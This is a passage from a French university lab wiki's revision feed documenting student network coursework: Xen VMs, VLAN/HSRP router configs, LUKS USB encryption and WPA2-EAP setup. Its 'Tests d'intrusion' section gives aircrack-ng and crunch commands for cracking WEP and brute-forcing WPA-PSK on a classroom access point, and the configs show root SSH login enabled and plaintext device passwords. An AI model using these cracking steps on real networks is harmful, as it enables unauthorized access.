 private-chlamydiae         : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-herpesgenital      : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-mycoplasma         : ok=10   changed=3    unreachable=0    failed=0&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52107</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52107"/>
				<updated>2020-01-26T22:25:09Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Playbooks */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
